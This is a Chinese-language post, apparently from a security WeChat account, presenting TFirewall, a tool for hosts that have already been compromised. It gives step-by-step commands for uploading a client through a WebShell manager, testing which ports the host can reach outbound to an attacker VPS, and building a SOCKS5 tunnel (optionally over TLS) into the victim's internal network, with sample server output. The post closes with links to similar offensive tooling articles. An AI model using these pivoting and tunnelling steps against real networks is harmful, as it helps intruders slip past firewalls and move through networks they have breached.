TFirewall是測試已控主機哪些端口可以出網及建立內網socks5代理的工具.工具主體使用golang開發,工具包含客戶端及服務端,適用于windows,linux,x64,x86.

使用方法

出網檢測

• 將tfs_linux_amd64上傳到VPS服務器(假設VPS的IP地址10.10.10.10)
• 直接運行.\tfs_linux_amd64 check啟動監聽,工具會自動監聽常用的TOP10端口,或通過 .\tfs_linux_amd64 check 20-23,53,80自定義監聽端口
• 服務端打印如下信息表示監聽成功

root@taZ:~# ./tfs_linux_amd64 check 20-23,53,80
Check Server listening:  [20 21 22 23 53 80]

• 通過WEBShell管理工具將tfc_windows_386.exe上傳到已控服務器
• 運行tfc_windows_386.exe check 10.10.10.10測試TOP10端口哪些可以出網

服務端對應命令.\tfs_linux_amd64 check

• 運行tfc_windows_386.exe check 10.10.10.10 20-23,53,80探測指定端口

服務端對應命令.\tfs_linux_amd64 check 20-23,53,80

• 觀察服務端輸出即可查看客戶端可以連接服務端哪些端口,使用什么協議

root@iZj6cbux9hc5eo9oyud2taZ:~# ./tfs_linux_amd64 check 23,80-82
Check Server listening:  [23 80 81]
RecvTCP On 172.17.20.209:23 From 175.132.138.137:16918 
RecvTCP On 172.17.20.209:80 From 175.132.138.137:50641 
RecvTCP On 172.17.20.209:81 From 175.132.138.137:38747 
RecvUDP On [::]:23 From 175.167.138.137:28822
RecvUDP On [::]:80 From 175.167.138.137:26831
RecvUDP On [::]:81 From 175.167.138.137:26832

內網socks5代理

• 將tfs_linux_amd64上傳到VPS服務器(假設VPS的IP地址10.10.10.10)
• 通過 .\tfs_linux_amd64 socks5 80 1080在80端口啟動控制監聽,1080啟動內網socks5端口
• 服務端打印如下信息表示監聽成功

root@vultr:~# ./tfs_linux_amd64 socks5 80 1080
Control Listening:  80
Socks5 Listening:  1080

• 通過WEBShell管理工具將``tfc_windows_386.exe```上傳到已控服務器
• 運行tfc_windows_386.exe socks5 10.10.10.10 80連接服務端
• 使用10.10.10.10:1080作為內網是socks5代理(11.11.11.11是該內網出口路由器的IP地址)

root@vultr:~# ./tfs_linux_amd64 socks5 80 1080
Control Listening:  80
Socks5 Listening:  1080
Socks5 new socket from :  11.11.11.11:55943
Control new socket from :  11.11.11.11:55789

內網socks5代理(TLS加密)

• 將tfs_linux_amd64上傳到VPS服務器(假設VPS的IP地址10.10.10.10)
• 將server.pem(tls公鑰),server.key(tls私鑰)上傳到server_linux_x64相同目錄
• 通過 .\tfs_linux_amd64 socks5 80 1080 tls在80端口啟動控制監聽,1080啟動內網socks5端口
• 服務端打印如下信息表示監聽成功

root@vultr:~# ./tfs_linux_amd64 socks5 80 1080
Control Listening:  80
Socks5 Listening:  1080

• 通過WEBShell管理工具將tfc_windows_386.exe上傳到已控服務器
• 運行tfc_windows_386.exe socks5 10.10.10.10 80 tls連接服務端
• 使用10.10.10.10:1080作為內網是socks5代理(11.11.11.11是該內網出口路由器的IP地址)

root@vultr:~# ./tfs_linux_amd64 socks5 80 1080
Control Listening:  80
Socks5 Listening:  1080
Socks5 new socket from :  11.11.11.11:55943
Control new socket from :  11.11.11.11:55789

已測試

server

• ubuntu 18

client

• Windows 10
• ubuntu 16
• kali

獲取方式

公眾號后臺回復關鍵詞：內網

往期推薦

工具|針對 AWVS掃描器開發的批量掃描腳本

干貨|應急響應常用工具

干貨|Java內存馬注入工具

實戰|記一次hw中的上線騷姿勢

強薦 | 滲透測試報告自動生成工具

干貨|通過 RPC 防火墻停止橫向移動